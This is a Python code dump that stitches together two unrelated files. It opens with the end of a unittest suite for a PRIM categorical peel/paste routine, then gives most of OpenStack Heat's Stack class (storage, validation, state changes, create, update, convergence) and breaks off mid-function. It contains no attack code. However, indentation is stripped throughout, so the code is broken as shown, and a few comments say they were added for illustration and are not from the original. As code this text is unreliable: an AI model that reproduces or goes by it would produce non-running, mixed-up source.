box = prim.PrimBox(prim_obj, box_lims, prim_obj.yi)
u = 'b'
x = x.select_dtypes(exclude=np.number).values
j = 0
peels = prim_obj._categorical_peel(box, u, j, x)
self.assertEqual(len(peels), 2)
for peel in peels:
pl = peel[1][u]
self.assertEqual(len(pl[0]), 1)
self.assertEqual(len(pl[1]), 1)
a = ('a',)
b = ('b',)
x = pd.DataFrame(list(zip(np.random.rand(10,),
[a, b, a, b, a,
a, b, a, b, a])),
columns=['a', 'b'])
y = np.random.randint(0,2, (10,))
y = y.astype(np.int)
y = {'y':y}
results = x, y
classify = 'y'
prim_obj = prim.setup_prim(results, classify, threshold=0.8)
box_lims = prim_obj.box_init
box = prim.PrimBox(prim_obj, box_lims, prim_obj.yi)
u = 'b'
x = x.select_dtypes(exclude=np.number).values
j = 0
peels = prim_obj._categorical_peel(box, u, j, x)
self.assertEqual(len(peels), 2)
for peel in peels:
pl = peel[1][u]
self.assertEqual(len(pl[0]), 1)
self.assertEqual(len(pl[1]), 1)
def test_categorical_paste(self):
a = np.random.rand(10,)
b = ['a','b','a','b','a','a','b','a','b','a', ]
x = pd.DataFrame(list(zip(a,b)), columns=['a', 'b'])
x['b'] = x['b'].astype('category')
y = np.random.randint(0,2, (10,))
y = y.astype(np.int)
y = {'y':y}
results = x,y
classify = 'y'
prim_obj = prim.setup_prim(results, classify, threshold=0.8)
box_lims = pd.DataFrame([(0, set(['a',])),
(1, set(['a',]))], columns=x.columns)
yi = np.where(x.loc[:,'b']=='a')
box = prim.PrimBox(prim_obj, box_lims, yi)
u = 'b'
pastes = prim_obj._categorical_paste(box, u, x, ['b'])
self.assertEqual(len(pastes), 1)
for paste in pastes:
indices, box_lims = paste
self.assertEqual(indices.shape[0], 10)
self.assertEqual(box_lims[u][0], set(['a','b']))
if __name__ == '__main__':
# ema_logging.log_to_stderr(ema_logging.INFO)
unittest.main()
# suite = unittest.TestSuite()
# suite.addTest(PrimTestCase("test_write_boxes_to_stdout"))
# unittest.TextTestRunner().run(suite)
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import copy
import datetime
import functools
import itertools
import re
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import excutils
from oslo_utils import timeutils as oslo_timeutils
from oslo_utils import uuidutils
from osprofiler import profiler
import six
from heat.common import context as common_context
from heat.common import environment_format as env_fmt
from heat.common import exception
from heat.common.i18n import _
from heat.common.i18n import _LE
from heat.common.i18n import _LI
from heat.common.i18n import _LW
from heat.common import identifier
from heat.common import lifecycle_plugin_utils
from heat.common import timeutils
from heat.engine import dependencies
from heat.engine import environment
from heat.engine import event
from heat.engine import function
from heat.engine.notification import stack as notification
from heat.engine import parameter_groups as param_groups
from heat.engine import resource
from heat.engine import resources
from heat.engine import scheduler
from heat.engine import sync_point
from heat.engine import template as tmpl
from heat.engine import update
from heat.objects import raw_template as raw_template_object
from heat.objects import resource as resource_objects
from heat.objects import snapshot as snapshot_object
from heat.objects import stack as stack_object
from heat.objects import stack_tag as stack_tag_object
from heat.objects import user_creds as ucreds_object
from heat.rpc import api as rpc_api
from heat.rpc import worker_client as rpc_worker_client
cfg.CONF.import_opt('error_wait_time', 'heat.common.config')
LOG = logging.getLogger(__name__)
class ForcedCancel(BaseException):
"""Exception raised to cancel task execution."""
def __init__(self, with_rollback=True):
self.with_rollback = with_rollback
def __str__(self):
return "Operation cancelled"
def reset_state_on_error(func):
@six.wraps(func)
def handle_exceptions(stack, *args, **kwargs):
errmsg = None
try:
return func(stack, *args, **kwargs)
except BaseException as exc:
with excutils.save_and_reraise_exception():
errmsg = six.text_type(exc)
LOG.error(_LE('Unexpected exception in %(func)s: %(msg)s'),
{'func': func.__name__, 'msg': errmsg})
finally:
if stack.status == stack.IN_PROGRESS:
msg = _("Unexpected returning while IN_PROGRESS.")
stack.state_set(stack.action, stack.FAILED,
errmsg if errmsg is not None else msg)
assert errmsg is not None, "Returned while IN_PROGRESS."
return handle_exceptions
@six.python_2_unicode_compatible
class Stack(collections.Mapping):
ACTIONS = (
CREATE, DELETE, UPDATE, ROLLBACK, SUSPEND, RESUME, ADOPT,
SNAPSHOT, CHECK, RESTORE
) = (
'CREATE', 'DELETE', 'UPDATE', 'ROLLBACK', 'SUSPEND', 'RESUME', 'ADOPT',
'SNAPSHOT', 'CHECK', 'RESTORE'
)
STATUSES = (IN_PROGRESS, FAILED, COMPLETE
) = ('IN_PROGRESS', 'FAILED', 'COMPLETE')
_zones = None
def __init__(self, context, stack_name, tmpl,
stack_id=None, action=None, status=None,
status_reason='', timeout_mins=None, resolve_data=True,
disable_rollback=True, parent_resource=None, owner_id=None,
adopt_stack_data=None, stack_user_project_id=None,
created_time=None, updated_time=None,
user_creds_id=None, tenant_id=None,
use_stored_context=False, username=None,
nested_depth=0, strict_validate=True, convergence=False,
current_traversal=None, tags=None, prev_raw_template_id=None,
current_deps=None, cache_data=None, resource_validate=True):
"""Initialise the Stack.
Initialise from a context, name, Template object and (optionally)
Environment object. The database ID may also be initialised, if the
stack is already in the database.
Creating a stack with cache_data creates a lightweight stack which
will not load any resources from the database and resolve the
functions from the cache_data specified.
"""
def _validate_stack_name(name):
if not re.match("[a-zA-Z][a-zA-Z0-9_.-]*$", name):
message = _('Invalid stack name %s must contain '
'only alphanumeric or \"_-.\" characters, '
'must start with alpha') % name
raise exception.StackValidationFailed(message=message)
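        # Names the regex above accepts/rejects (illustrative examples, not
        # from the original source): "web-stack_1" and "App.prod" pass, while
        # "1stack" (no leading letter) and "my stack" (whitespace) fail.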
if owner_id is None:
_validate_stack_name(stack_name)
self.id = stack_id
self.owner_id = owner_id
self.context = context
self.t = tmpl
self.name = stack_name
self.action = (self.ADOPT if adopt_stack_data else
self.CREATE if action is None else action)
self.status = self.IN_PROGRESS if status is None else status
self.status_reason = status_reason
self.timeout_mins = timeout_mins
self.disable_rollback = disable_rollback
self.parent_resource_name = parent_resource
self._parent_stack = None
self._resources = None
self._dependencies = None
self._access_allowed_handlers = {}
self._db_resources = None
self.adopt_stack_data = adopt_stack_data
self.stack_user_project_id = stack_user_project_id
self.created_time = created_time
self.updated_time = updated_time
self.user_creds_id = user_creds_id
self.nested_depth = nested_depth
self.convergence = convergence
self.current_traversal = current_traversal
self.tags = tags
self.prev_raw_template_id = prev_raw_template_id
self.current_deps = current_deps
self.cache_data = cache_data
self._worker_client = None
self._convg_deps = None
# strict_validate can be used to disable value validation
# in the resource properties schema, this is useful when
# performing validation when properties reference attributes
# for not-yet-created resources (which return None)
self.strict_validate = strict_validate
# resource_validate can be used to disable resource plugin subclass
# validate methods, which is useful when you want to validate
# template integrity but some parameters may not be provided
# at all, thus we can't yet reference property values such as is
# commonly done in plugin validate() methods
self.resource_validate = resource_validate
if use_stored_context:
self.context = self.stored_context()
self.clients = self.context.clients
# This will use the provided tenant ID when loading the stack
# from the DB or get it from the context for new stacks.
self.tenant_id = tenant_id or self.context.tenant_id
self.username = username or self.context.username
resources.initialise()
self.parameters = self.t.parameters(
self.identifier(),
user_params=self.env.params,
param_defaults=self.env.param_defaults)
self._set_param_stackid()
if resolve_data:
self.outputs = self.resolve_static_data(self.t[self.t.OUTPUTS])
else:
self.outputs = {}
@property
def worker_client(self):
"""Return a client for making engine RPC calls."""
if not self._worker_client:
self._worker_client = rpc_worker_client.WorkerClient()
return self._worker_client
@property
def env(self):
"""This is a helper to allow resources to access stack.env."""
return self.t.env
@property
def parent_resource(self):
"""Dynamically load up the parent_resource.
Note: this should only be used by "Fn::ResourceFacade"
"""
if self._parent_stack is None:
# we need both parent name and owner id.
if self.parent_resource_name is None or self.owner_id is None:
return None
try:
owner = self.load(self.context, stack_id=self.owner_id)
except exception.NotFound:
return None
self._parent_stack = owner
return self._parent_stack[self.parent_resource_name]
def stored_context(self):
if self.user_creds_id:
creds_obj = ucreds_object.UserCreds.get_by_id(self.user_creds_id)
# Maintain request_id from self.context so we retain traceability
# in situations where servicing a request requires switching from
# the request context to the stored context
creds = creds_obj.obj_to_primitive()["versioned_object.data"]
creds['request_id'] = self.context.request_id
# We don't store roles in the user_creds table, so disable the
# policy check for admin by setting is_admin=False.
creds['is_admin'] = False
return common_context.RequestContext.from_dict(creds)
else:
msg = _("Attempt to use stored_context with no user_creds")
raise exception.Error(msg)
@property
def resources(self):
if self._resources is None:
self._resources = dict((name, resource.Resource(name, data, self))
for (name, data) in
self.t.resource_definitions(self).items())
# There is no need to continue storing the db resources
# after resource creation
self._db_resources = None
return self._resources
def iter_resources(self, nested_depth=0):
"""Iterates over all the resources in a stack.
Iterating includes nested stacks up to `nested_depth` levels below.
"""
for res in six.itervalues(self):
yield res
if not res.has_nested() or nested_depth == 0:
continue
nested_stack = res.nested()
for nested_res in nested_stack.iter_resources(nested_depth - 1):
yield nested_res
def _db_resources_get(self, key_id=False):
try:
return resource_objects.Resource.get_all_by_stack(
self.context, self.id, key_id)
except exception.NotFound:
return None
def db_resource_get(self, name):
if not self.id:
return None
if self._db_resources is None:
self._db_resources = self._db_resources_get()
return self._db_resources.get(name) if self._db_resources else None
@property
def dependencies(self):
if self._dependencies is None:
self._dependencies = self._get_dependencies(
six.itervalues(self.resources))
return self._dependencies
def reset_dependencies(self):
self._dependencies = None
def root_stack_id(self):
if not self.owner_id:
return self.id
return stack_object.Stack.get_root_id(self.context, self.owner_id)
def object_path_in_stack(self):
"""Return stack resources and stacks in path from the root stack.
If this is not nested return (None, self), else return stack resources
and stacks in path from the root stack and including this stack.
:returns: a list of (stack_resource, stack) tuples.
"""
if self.parent_resource and self.parent_resource.stack:
path = self.parent_resource.stack.object_path_in_stack()
path.extend([(self.parent_resource, self)])
return path
return [(None, self)]
def path_in_stack(self):
"""Return tuples of names in path from the root stack.
If this is not nested return (None, self.name), else return tuples of
names (stack_resource.name, stack.name) in path from the root stack and
including this stack.
:returns: a list of (string, string) tuples.
"""
opis = self.object_path_in_stack()
return [(stckres.name if stckres else None,
stck.name if stck else None) for stckres, stck in opis]
def total_resources(self, stack_id=None):
"""Return the total number of resources in a stack.
Includes nested stacks below.
"""
if not stack_id:
stack_id = self.id
return stack_object.Stack.count_total_resources(self.context, stack_id)
def _set_param_stackid(self):
"""Update self.parameters with the current ARN.
The ARN is then provided via the Parameters class as the StackId pseudo
parameter.
"""
if not self.parameters.set_stack_id(self.identifier()):
LOG.warn(_LW("Unable to set parameters StackId identifier"))
@staticmethod
def get_dep_attrs(resources, outputs, resource_name):
"""Return the attributes of the specified resource that are referenced.
Return an iterator over any attributes of the specified resource that
are referenced.
"""
attr_lists = itertools.chain((res.dep_attrs(resource_name)
for res in resources),
(function.dep_attrs(out.get('Value', ''),
resource_name)
for out in six.itervalues(outputs)))
return set(itertools.chain.from_iterable(attr_lists))
@staticmethod
def _get_dependencies(resources):
"""Return the dependency graph for a list of resources."""
deps = dependencies.Dependencies()
for res in resources:
res.add_dependencies(deps)
return deps
@classmethod
def load(cls, context, stack_id=None, stack=None, show_deleted=True,
use_stored_context=False, force_reload=False, cache_data=None,
resolve_data=True):
"""Retrieve a Stack from the database."""
if stack is None:
stack = stack_object.Stack.get_by_id(
context,
stack_id,
show_deleted=show_deleted,
eager_load=True)
if stack is None:
message = _('No stack exists with id "%s"') % str(stack_id)
raise exception.NotFound(message)
if force_reload:
stack.refresh()
return cls._from_db(context, stack,
use_stored_context=use_stored_context,
cache_data=cache_data, resolve_data=resolve_data)
@classmethod
def load_all(cls, context, limit=None, marker=None, sort_keys=None,
sort_dir=None, filters=None, tenant_safe=True,
show_deleted=False, resolve_data=True,
show_nested=False, show_hidden=False, tags=None,
tags_any=None, not_tags=None, not_tags_any=None):
stacks = stack_object.Stack.get_all(
context,
limit,
sort_keys,
marker,
sort_dir,
filters,
tenant_safe,
show_deleted,
show_nested,
show_hidden,
tags,
tags_any,
not_tags,
not_tags_any) or []
for stack in stacks:
try:
yield cls._from_db(context, stack, resolve_data=resolve_data)
except exception.NotFound:
# We're in a different transaction than the get_all, so a stack
# returned above can be deleted by the time we try to load it.
pass
@classmethod
def _from_db(cls, context, stack, resolve_data=True,
use_stored_context=False, cache_data=None):
template = tmpl.Template.load(
context, stack.raw_template_id, stack.raw_template)
tags = None
if stack.tags:
tags = [t.tag for t in stack.tags]
return cls(context, stack.name, template,
stack_id=stack.id,
action=stack.action, status=stack.status,
status_reason=stack.status_reason,
timeout_mins=stack.timeout,
resolve_data=resolve_data,
disable_rollback=stack.disable_rollback,
parent_resource=stack.parent_resource_name,
owner_id=stack.owner_id,
stack_user_project_id=stack.stack_user_project_id,
created_time=stack.created_at,
updated_time=stack.updated_at,
user_creds_id=stack.user_creds_id, tenant_id=stack.tenant,
use_stored_context=use_stored_context,
username=stack.username, convergence=stack.convergence,
current_traversal=stack.current_traversal, tags=tags,
prev_raw_template_id=stack.prev_raw_template_id,
current_deps=stack.current_deps, cache_data=cache_data)
def get_kwargs_for_cloning(self, keep_status=False, only_db=False):
"""Get common kwargs for calling Stack() for cloning.
The point of this method is to reduce the number of places that we
need to update when a kwarg to Stack.__init__() is modified. It
is otherwise easy to forget an option and cause some unexpected
error if this option is lost.
Note:
- This doesn't return the args (name, template) but only the kwargs.
- We often want to start 'fresh' so don't want to maintain the old
status, action and status_reason.
- We sometimes only want the DB attributes.
"""
stack = {
'owner_id': self.owner_id,
'username': self.username,
'disable_rollback': self.disable_rollback,
'stack_user_project_id': self.stack_user_project_id,
'user_creds_id': self.user_creds_id,
'nested_depth': self.nested_depth,
'convergence': self.convergence,
'current_traversal': self.current_traversal,
'prev_raw_template_id': self.prev_raw_template_id,
'current_deps': self.current_deps
}
if keep_status:
stack.update({
'action': self.action,
'status': self.status,
'status_reason': self.status_reason})
if only_db:
stack['parent_resource_name'] = self.parent_resource_name
stack['tenant'] = self.tenant_id
stack['timeout'] = self.timeout_mins
else:
stack['parent_resource'] = self.parent_resource_name
stack['tenant_id'] = self.tenant_id
stack['timeout_mins'] = self.timeout_mins
stack['strict_validate'] = self.strict_validate
return stack
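# Minimal sketch of how these cloning kwargs are consumed elsewhere in this
# class (see _backup_stack below); shown here only for illustration:
#
# kwargs = self.get_kwargs_for_cloning()
# clone = type(self)(self.context, self.name, copy.deepcopy(self.t), **kwargs)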
@profiler.trace('Stack.store', hide_args=False)
def store(self, backup=False, exp_trvsl=None):
"""Store the stack in the database and return its ID.
If self.id is set, we update the existing stack.
"""
s = self.get_kwargs_for_cloning(keep_status=True, only_db=True)
s['name'] = self._backup_name() if backup else self.name
s['backup'] = backup
s['updated_at'] = self.updated_time
if self.t.id is None:
stack_object.Stack.encrypt_hidden_parameters(self.t)
s['raw_template_id'] = self.t.store(self.context)
else:
s['raw_template_id'] = self.t.id
if self.id:
if exp_trvsl is None:
exp_trvsl = self.current_traversal
if self.convergence:
# do things differently for convergence
updated = stack_object.Stack.select_and_update(
self.context, self.id, s, exp_trvsl=exp_trvsl)
if not updated:
return None
else:
stack_object.Stack.update_by_id(self.context, self.id, s)
else:
if not self.user_creds_id:
# Create a context containing a trust_id and trustor_user_id
# if trusts are enabled
if cfg.CONF.deferred_auth_method == 'trusts':
keystone = self.clients.client('keystone')
trust_ctx = keystone.create_trust_context()
new_creds = ucreds_object.UserCreds.create(trust_ctx)
else:
new_creds = ucreds_object.UserCreds.create(self.context)
s['user_creds_id'] = new_creds.id
self.user_creds_id = new_creds.id
if self.convergence:
# create a traversal ID
self.current_traversal = uuidutils.generate_uuid()
s['current_traversal'] = self.current_traversal
new_s = stack_object.Stack.create(self.context, s)
self.id = new_s.id
self.created_time = new_s.created_at
if self.tags:
stack_tag_object.StackTagList.set(self.context, self.id, self.tags)
self._set_param_stackid()
return self.id
def _backup_name(self):
return '%s*' % self.name
def identifier(self):
"""Return an identifier for this stack."""
return identifier.HeatIdentifier(self.tenant_id, self.name, self.id)
def __iter__(self):
"""Return an iterator over the resource names."""
return iter(self.resources)
def __len__(self):
"""Return the number of resources."""
return len(self.resources)
def __getitem__(self, key):
"""Get the resource with the specified name."""
return self.resources[key]
def add_resource(self, resource):
"""Insert the given resource into the stack."""
template = resource.stack.t
resource.stack = self
definition = resource.t.reparse(self, template)
resource.t = definition
resource.reparse()
self.resources[resource.name] = resource
self.t.add_resource(definition)
if self.t.id is not None:
self.t.store(self.context)
if resource.action == resource.INIT:
resource._store()
def remove_resource(self, resource_name):
"""Remove the resource with the specified name."""
del self.resources[resource_name]
self.t.remove_resource(resource_name)
if self.t.id is not None:
self.t.store(self.context)
def __contains__(self, key):
"""Determine whether the stack contains the specified resource."""
if self._resources is not None:
return key in self.resources
else:
return key in self.t[self.t.RESOURCES]
def __eq__(self, other):
"""Compare two Stacks for equality.
Stacks are considered equal only if they are identical.
"""
return self is other
def __str__(self):
"""Return a human-readable string representation of the stack."""
text = 'Stack "%s" [%s]' % (self.name, self.id)
return six.text_type(text)
def resource_by_refid(self, refid):
"""Return the resource in this stack with the specified refid.
:returns: resource in this stack with the specified refid, or None if
not found.
"""
for r in six.itervalues(self):
if r.state in (
(r.INIT, r.COMPLETE),
(r.CREATE, r.IN_PROGRESS),
(r.CREATE, r.COMPLETE),
(r.RESUME, r.IN_PROGRESS),
(r.RESUME, r.COMPLETE),
(r.UPDATE, r.IN_PROGRESS),
(r.UPDATE, r.COMPLETE)) and r.FnGetRefId() == refid:
return r
def register_access_allowed_handler(self, credential_id, handler):
"""Register an authorization handler function.
Register a function which determines whether the credentials with a
given ID can have access to a named resource.
"""
assert callable(handler), 'Handler is not callable'
self._access_allowed_handlers[credential_id] = handler
def access_allowed(self, credential_id, resource_name):
"""Is credential_id authorised to access resource by resource_name."""
if not self.resources:
# this also triggers lazy-loading of resources
# so is required for register_access_allowed_handler
# to be called
return False
handler = self._access_allowed_handlers.get(credential_id)
return handler and handler(resource_name)
@profiler.trace('Stack.validate', hide_args=False)
def validate(self):
"""Validates the stack."""
# TODO(sdake) Should return line number of invalid reference
# validate overall template (top-level structure)
self.t.validate()
# Validate parameters
self.parameters.validate(context=self.context,
validate_value=self.strict_validate)
# Validate Parameter Groups
parameter_groups = param_groups.ParameterGroups(self.t)
parameter_groups.validate()
# Validate types of sections in ResourceDefinitions
self.t.validate_resource_definitions(self)
# Check duplicate names between parameters and resources
dup_names = (set(six.iterkeys(self.parameters)) &
set(six.iterkeys(self)))
if dup_names:
LOG.debug("Duplicate names %s" % dup_names)
raise exception.StackValidationFailed(
message=_("Duplicate names %s") % dup_names)
for res in self.dependencies:
try:
if self.resource_validate:
result = res.validate()
else:
result = res.validate_template()
except exception.HeatException as ex:
LOG.debug('%s', ex)
raise ex
except AssertionError:
raise
except Exception as ex:
LOG.exception(_LE("Exception: %s"), ex)
raise exception.StackValidationFailed(
message=encodeutils.safe_decode(six.text_type(ex)))
if result:
raise exception.StackValidationFailed(message=result)
for key, val in self.outputs.items():
if not isinstance(val, collections.Mapping):
message = _('Outputs must contain Output. '
'Found a [%s] instead') % type(val)
raise exception.StackValidationFailed(
error='Output validation error',
path=[self.t.OUTPUTS],
message=message)
try:
if not val or 'Value' not in val:
message = _('Each Output must contain '
'a Value key.')
raise exception.StackValidationFailed(
error='Output validation error',
path=[self.t.OUTPUTS, key],
message=message)
function.validate(val.get('Value'))
except exception.StackValidationFailed as ex:
raise
except AssertionError:
raise
except Exception as ex:
raise exception.StackValidationFailed(
error='Output validation error',
path=[self.t.OUTPUTS, key,
self.t.get_section_name('Value')],
message=six.text_type(ex))
def requires_deferred_auth(self):
"""Determine whether to perform API requests with deferred auth.
Returns whether this stack may need to perform API requests
during its lifecycle using the configured deferred authentication
method.
"""
return any(res.requires_deferred_auth for res in six.itervalues(self))
def _add_event(self, action, status, reason):
"""Add a state change event to the database."""
ev = event.Event(self.context, self, action, status, reason,
self.id, {},
self.name, 'OS::Heat::Stack')
ev.store()
@profiler.trace('Stack.state_set', hide_args=False)
def state_set(self, action, status, reason):
"""Update the stack state."""
if action not in self.ACTIONS:
raise ValueError(_("Invalid action %s") % action)
if status not in self.STATUSES:
raise ValueError(_("Invalid status %s") % status)
self.action = action
self.status = status
self.status_reason = reason
if self.convergence and action in (self.UPDATE, self.DELETE,
self.CREATE, self.ADOPT):
# if convergence is enabled and the stack operation is
# create/update/delete, the stack lock is not used, hence persist state
updated = self._persist_state()
if not updated:
# Possibly failed concurrent update
LOG.warn(_LW("Failed to set state of stack %(name)s with"
" traversal ID %(trvsl_id)s, to"
" %(action)s_%(status)s"),
{'name': self.name,
'trvsl_id': self.current_traversal,
'action': action, 'status': status})
return updated
# Persist state to db only if status == IN_PROGRESS
# or action == UPDATE/DELETE/ROLLBACK. Else, it would
# be done before releasing the stack lock.
if status == self.IN_PROGRESS or action in (
self.UPDATE, self.DELETE, self.ROLLBACK):
self._persist_state()
def _persist_state(self):
"""Persist stack state to database"""
if self.id is None:
return
stack = stack_object.Stack.get_by_id(self.context, self.id)
if stack is not None:
values = {'action': self.action,
'status': self.status,
'status_reason': self.status_reason}
self._send_notification_and_add_event()
if self.convergence:
# do things differently for convergence
updated = stack_object.Stack.select_and_update(
self.context, self.id, values,
exp_trvsl=self.current_traversal)
return updated
else:
stack.update_and_save(values)
def _send_notification_and_add_event(self):
notification.send(self)
self._add_event(self.action, self.status, self.status_reason)
LOG.info(_LI('Stack %(action)s %(status)s (%(name)s): '
'%(reason)s'),
{'action': self.action,
'status': self.status,
'name': self.name,
'reason': self.status_reason})
def persist_state_and_release_lock(self, engine_id):
"""Persist stack state to database and release stack lock"""
if self.id is None:
return
stack = stack_object.Stack.get_by_id(self.context, self.id)
if stack is not None:
values = {'action': self.action,
'status': self.status,
'status_reason': self.status_reason}
self._send_notification_and_add_event()
stack.persist_state_and_release_lock(self.context, self.id,
engine_id, values)
@property
def state(self):
"""Returns state, tuple of action, status."""
return (self.action, self.status)
def timeout_secs(self):
"""Return the stack action timeout in seconds."""
if self.timeout_mins is None:
return cfg.CONF.stack_action_timeout
return self.timeout_mins * 60
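# Worked example (illustrative): with timeout_mins=60 this returns 3600
# seconds; with timeout_mins=None it falls back to the configured
# cfg.CONF.stack_action_timeout default.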
def preview_resources(self):
"""Preview the stack with all of the resources."""
return [resource.preview()
for resource in six.itervalues(self.resources)]
def _store_resources(self):
for r in reversed(self.dependencies):
if r.action == r.INIT:
r._store()
@profiler.trace('Stack.create', hide_args=False)
@reset_state_on_error
def create(self):
"""Create the stack and all of the resources."""
def rollback():
if not self.disable_rollback and self.state == (self.CREATE,
self.FAILED):
self.delete(action=self.ROLLBACK)
self._store_resources()
creator = scheduler.TaskRunner(
self.stack_task, action=self.CREATE,
reverse=False, post_func=rollback,
error_wait_time=cfg.CONF.error_wait_time)
creator(timeout=self.timeout_secs())
def _adopt_kwargs(self, resource):
data = self.adopt_stack_data
if not data or not data.get('resources'):
return {'resource_data': None}
return {'resource_data': data['resources'].get(resource.name)}
@scheduler.wrappertask
def stack_task(self, action, reverse=False, post_func=None,
error_wait_time=None,
aggregate_exceptions=False, pre_completion_func=None):
"""A task to perform an action on the stack.
All of the resources are traversed in forward or reverse dependency
order.
:param action: action that should be executed on the stack resources
:param reverse: whether the action on the resources needs to be executed
in reverse dependency order (resources first, and then their dependencies)
:param post_func: function that needs to be executed after the
action completes on the stack
:param error_wait_time: time to wait before cancelling all execution
threads when an error occurs
:param aggregate_exceptions: whether exceptions should be aggregated
:param pre_completion_func: function that needs to be executed right
before action completion. Uses stack, action, status and reason as
input parameters
"""
try:
lifecycle_plugin_utils.do_pre_ops(self.context, self,
None, action)
except Exception as e:
self.state_set(action, self.FAILED, e.args[0] if e.args else
'Failed stack pre-ops: %s' % six.text_type(e))
if callable(post_func):
post_func()
return
self.state_set(action, self.IN_PROGRESS,
'Stack %s started' % action)
stack_status = self.COMPLETE
reason = 'Stack %s completed successfully' % action
action_method = action.lower()
# If a local _$action_kwargs function exists, call it to get the
# action specific argument list, otherwise an empty arg list
handle_kwargs = getattr(self,
'_%s_kwargs' % action_method,
lambda x: {})
@functools.wraps(getattr(resource.Resource, action_method))
def resource_action(r):
# Find e.g resource.create and call it
handle = getattr(r, action_method)
return handle(**handle_kwargs(r))
action_task = scheduler.DependencyTaskGroup(
self.dependencies,
resource_action,
reverse,
error_wait_time=error_wait_time,
aggregate_exceptions=aggregate_exceptions)
try:
yield action_task()
except scheduler.Timeout:
stack_status = self.FAILED
reason = '%s timed out' % action.title()
except Exception as ex:
# We use a catch-all here to ensure any raised exceptions
# make the stack fail. This is necessary for when
# aggregate_exceptions is false, as in that case we don't get
# ExceptionGroup, but the raw exception.
# see scheduler.py line 395-399
stack_status = self.FAILED
reason = 'Resource %s failed: %s' % (action, six.text_type(ex))
if pre_completion_func:
pre_completion_func(self, action, stack_status, reason)
self.state_set(action, stack_status, reason)
if callable(post_func):
post_func()
lifecycle_plugin_utils.do_post_ops(self.context, self, None, action,
(self.status == self.FAILED))
@profiler.trace('Stack.check', hide_args=False)
@reset_state_on_error
def check(self):
self.updated_time = oslo_timeutils.utcnow()
checker = scheduler.TaskRunner(
self.stack_task, self.CHECK,
post_func=self.supports_check_action,
error_wait_time=cfg.CONF.error_wait_time,
aggregate_exceptions=True)
checker()
def supports_check_action(self):
def is_supported(stack, res):
if res.has_nested():
return res.nested().supports_check_action()
else:
return hasattr(res, 'handle_%s' % self.CHECK.lower())
supported = [is_supported(self, res)
for res in six.itervalues(self.resources)]
if not all(supported):
msg = ". '%s' not fully supported (see resources)" % self.CHECK
reason = self.status_reason + msg
self.state_set(self.CHECK, self.status, reason)
return all(supported)
@profiler.trace('Stack._backup_stack', hide_args=False)
def _backup_stack(self, create_if_missing=True):
"""Backup the stack.
Get a Stack containing any in-progress resources from the previous
stack state prior to an update.
"""
s = stack_object.Stack.get_by_name_and_owner_id(
self.context,
self._backup_name(),
owner_id=self.id)
if s is not None:
LOG.debug('Loaded existing backup stack')
return self.load(self.context, stack=s)
elif create_if_missing:
kwargs = self.get_kwargs_for_cloning()
kwargs['owner_id'] = self.id
del(kwargs['prev_raw_template_id'])
prev = type(self)(self.context, self.name, copy.deepcopy(self.t),
**kwargs)
prev.store(backup=True)
LOG.debug('Created new backup stack')
return prev
else:
return None
@profiler.trace('Stack.adopt', hide_args=False)
@reset_state_on_error
def adopt(self):
"""Adopt existing resources into a new stack."""
def rollback():
if not self.disable_rollback and self.state == (self.ADOPT,
self.FAILED):
# enter the same flow as abandon and just delete the stack
for res in six.itervalues(self.resources):
res.abandon_in_progress = True
self.delete(action=self.ROLLBACK, abandon=True)
creator = scheduler.TaskRunner(
self.stack_task,
action=self.ADOPT,
reverse=False,
error_wait_time=cfg.CONF.error_wait_time,
post_func=rollback)
creator(timeout=self.timeout_secs())
@profiler.trace('Stack.update', hide_args=False)
@reset_state_on_error
def update(self, newstack, event=None):
"""Update the stack.
Compare the current stack with newstack,
and where necessary create/update/delete the resources until
this stack aligns with newstack.
Note that update of existing stack resources depends on update
being implemented in the underlying resource types.
Update will fail if it exceeds the specified timeout. The default is
60 minutes, set in the constructor.
"""
self.updated_time = oslo_timeutils.utcnow()
updater = scheduler.TaskRunner(self.update_task, newstack,
event=event)
updater()
@profiler.trace('Stack.converge_stack', hide_args=False)
def converge_stack(self, template, action=UPDATE, new_stack=None):
"""Update the stack template and trigger convergence for resources."""
if action not in [self.CREATE, self.ADOPT]:
# no back-up template for create action
self.prev_raw_template_id = getattr(self.t, 'id', None)
# switch template and reset dependencies
self.t = template
self.reset_dependencies()
self._resources = None
if action is not self.CREATE:
self.updated_time = oslo_timeutils.utcnow()
if new_stack is not None:
self.disable_rollback = new_stack.disable_rollback
self.timeout_mins = new_stack.timeout_mins
self._set_param_stackid()
self.tags = new_stack.tags
if new_stack.tags:
stack_tag_object.StackTagList.set(self.context, self.id,
new_stack.tags)
else:
stack_tag_object.StackTagList.delete(self.context, self.id)
self.action = action
self.status = self.IN_PROGRESS
self.status_reason = 'Stack %s started' % self.action
# generate new traversal and store
previous_traversal = self.current_traversal
self.current_traversal = uuidutils.generate_uuid()
# we expect to update the stack having previous traversal ID
stack_id = self.store(exp_trvsl=previous_traversal)
if stack_id is None:
LOG.warn(_LW("Failed to store stack %(name)s with traversal ID"
" %(trvsl_id)s, aborting stack %(action)s"),
{'name': self.name, 'trvsl_id': previous_traversal,
'action': self.action})
return
self._send_notification_and_add_event()
# delete the prev traversal sync_points
if previous_traversal:
sync_point.delete_all(self.context, self.id, previous_traversal)
# TODO(later): lifecycle_plugin_utils.do_pre_ops
self._converge_create_or_update()
def _converge_create_or_update(self):
current_resources = self._update_or_store_resources()
self._compute_convg_dependencies(self.ext_rsrcs_db, self.dependencies,
current_resources)
# Store list of edges
self.current_deps = {
'edges': [[rqr, rqd] for rqr, rqd in
self.convergence_dependencies.graph().edges()]}
stack_id = self.store()
if stack_id is None:
# Failed concurrent update
LOG.warn(_LW("Failed to store stack %(name)s with traversal ID"
" %(trvsl_id)s, aborting stack %(action)s"),
{'name': self.name, 'trvsl_id': self.current_traversal,
'action': self.action})
return
LOG.info(_LI('convergence_dependencies: %s'),
self.convergence_dependencies)
# create sync_points for resources in DB
for rsrc_id, is_update in self.convergence_dependencies:
sync_point.create(self.context, rsrc_id,
self.current_traversal, is_update,
self.id)
# create sync_point entry for stack
sync_point.create(
self.context, self.id, self.current_traversal, True, self.id)
leaves = set(self.convergence_dependencies.leaves())
if not any(leaves):
self.mark_complete()
else:
for rsrc_id, is_update in self.convergence_dependencies.leaves():
if is_update:
LOG.info(_LI("Triggering resource %s for update"), rsrc_id)
